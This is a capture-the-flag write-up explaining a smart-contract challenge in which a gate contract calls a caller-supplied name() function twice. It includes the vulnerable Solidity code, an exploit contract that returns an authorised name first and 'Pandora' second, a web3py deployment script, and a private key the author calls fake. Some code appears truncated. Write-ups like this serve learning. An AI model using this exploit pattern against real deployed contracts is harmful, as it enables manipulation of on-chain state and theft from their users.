When we first start the challenge, we have two URLs as it was common on the blockchain part of this CTF:
The first one is an RPC URL, we will use it to connect to the blockchain.
The second is a TCP port, we can connect to it using nc
This allows us to retrieve connection information that we will need for the challenge:
1 - Connection information 2 - Restart Instance 3 - Get flag action? 1 Private key : 0xa22d64ea53f80c513cf9223d4d968d96637819568b2a81f33d070e4818a1c382 Address : 0x23b6462992d4131BE158f20B6aEEab2Fd6887b3B Target contract : 0xDa2FE820ae9135E877ac01aA657743B7c75Fe4bb Setup contract : 0x1ba407613f8d2D40b70b70d312f05F6f2628e58F
Of course the private key is a false one, you won’t win the big prize today x)
And the Get flag
tells us the challenge isn’t solved yet.
We also have some files that we downloaded at the start of the challenge, let’s check what’s inside of them:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;
import {HighSecurityGate} from "./FortifiedPerimeter.sol";
contract Setup {
HighSecurityGate public immutable TARGET;
constructor() {
TARGET = new HighSecurityGate();
function isSolved() public view returns (bool) {
return TARGET.strcmp(TARGET.lastEntrant(), "Pandora");
We can for now see with the function isSolved
that we need to verify TARGET.lastEntrant() == "Pandora"
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;
interface Entrant {
function name() external returns (string memory);
contract HighSecurityGate {
string[] private authorized = ["Orion", "Nova", "Eclipse"];
string public lastEntrant;
function enter() external {
Entrant _entrant = Entrant(msg.sender);
require(_isAuthorized(_entrant.name()), "Intruder detected");
lastEntrant = _entrant.name();
function _isAuthorized(string memory _user) private view returns (bool){
for (uint i; i < authorized.length; i++){
if (strcmp(_user, authorized[i])){
return true;
return false;
function strcmp(string memory _str1, string memory _str2) public pure returns (bool){
return keccak256(abi.encodePacked(_str1)) == keccak256(abi.encodePacked(_str2));
Here we see multiple interesting things. First, we understand what was this “lastEntrant” thing, we have a list authorized = ["Orion", "Nova", "Eclipse"]
. To modify the variable lastEntrant
we need to use the function enter
which will change the value of lastEntrant
to match with the name of the person using the function (the entrant), after checking that the name of this entrant is indeed in authorized
This name
function is defined as an external
function in the Entrant
interface. In Solidity, the external
keyword means that the function is called from outside the contract. To read more about function types, you can check the doc here. Here, it is left to the person interacting with the enter
function to implement it. In itself, this is not a vulnerability.
But the vulnerability comes in the following two lines:
require(_isAuthorized(_entrant.name()), "Intruder detected");
lastEntrant = _entrant.name();
The interesting thing to note here is that the name
function is called twice, first to check that it is an authorized name, and a second time to change the value of lastEntrant
. And we are the ones that implement the name
function ! The idea of how to flag the challenge is the following:
“What if we gave a name in the authorized list the first time the function is called and the name Pandora the second time ?”
I started by writing a solidity file for this (fake_entrant.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;
interface Entrant {
function name() external returns (string memory);
interface HighSecurityGate {
function enter() external;
contract FakeEntrant is Entrant {
bool private _hasBeenCalled = false;
HighSecurityGate _gate;
constructor(address gateAddress){
_gate = HighSecurityGate(gateAddress);
function callEnter() public {
function name() external override returns (string memory) {
if (!_hasBeenCalled) {
_hasBeenCalled = true;
return "Orion";
} else {
return "Pandora";
The name
function does exactly what was described above. The callEnter
function is here to be able to ask for the enter
function on behalf of this contract.
We can’t just call the enter
function ourselves, because we don’t have the name
function implemented.
So instead of doing this: us -> enter
We do: us -> callEnter -> fake_entrant.sol -> enter
The fake_entrant.sol
acts as a middle man for us.
And here is the web3py
code to make all of this work (sneaking_in.py
from web3 import Web3
from abi import *
import solcx
url = ''
# nc 32646
private_key = "0xa22d64ea53f80c513cf9223d4d968d96637819568b2a81f33d070e4818a1c382" # this is a false one btw
address = "0x23b6462992d4131BE158f20B6aEEab2Fd6887b3B"
target_contract = "0xDa2FE820ae9135E877ac01aA657743B7c75Fe4bb"
setup_contract = "0x1ba407613f8d2D40b70b70d312f05F6f2628e58F"
w3 = Web3(Web3.HTTPProvider(url))
print('[+] Connection successful' if w3.is_connected() else '[-] Connection failed')
contract_fortified_perimeter = w3.eth.contract(target_contract, abi = abi_fortified_perimeter)
contract_setup = w3.eth.contract(setup_contract, abi = abi_setup)
# Compile the contract
comp = solcx.compile_files("./fake_entrant.sol", output_values=["abi", "bin"])['fake_entrant.sol:FakeEntrant']
# Deploy the contract
contract_fake_entrant = w3.eth.contract(abi=comp['abi'], bytecode=comp['bin'])
tx_hash = contract_fake_entrant.constructor(target_contract).transact()
tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
contract_fake_entrant_address = tx_receipt.contractAddress
new_contract_fake_entrant = w3.eth.contract(abi=comp['abi'],address=tx_receipt.contractAddress)
# print(f'Receipt : {tx_receipt}')
print(f'Contract address : {contract_fake_entrant_address}')
print("Calling the enter function")
print(f'lastEntrant = {contract_fortified_perimeter.functions.lastEntrant().call()}')
print(f'isSolved = {contract_setup.functions.isSolved().call()}')
# goal is to make last entrant as "Pandora"
After that we just need to nc
and get the flag !
Few things to note here:
- I used Remix (an online tool) to compile the
files in order to get their ABI (that’s basically a list of the functions and attributes of the contracts in the file) - solcx is a python interface to use the solc compiler
- I am still unsure as to why I had to recreate the contract using the address of the contract. I thought it would already be in the blockchain when I used the constructor, but it seems that the local instance is separated from the online instance of the contract.
Also if you just started working with web3 (as I did before this CTF), the difference between call
and transact
functions is that call
is a read only function (meaning you look at the state of what you are calling) whereas transact
is used to make a change.
I hope this WU was clear, thank you for reading through it.
Turtyo for the Supwn team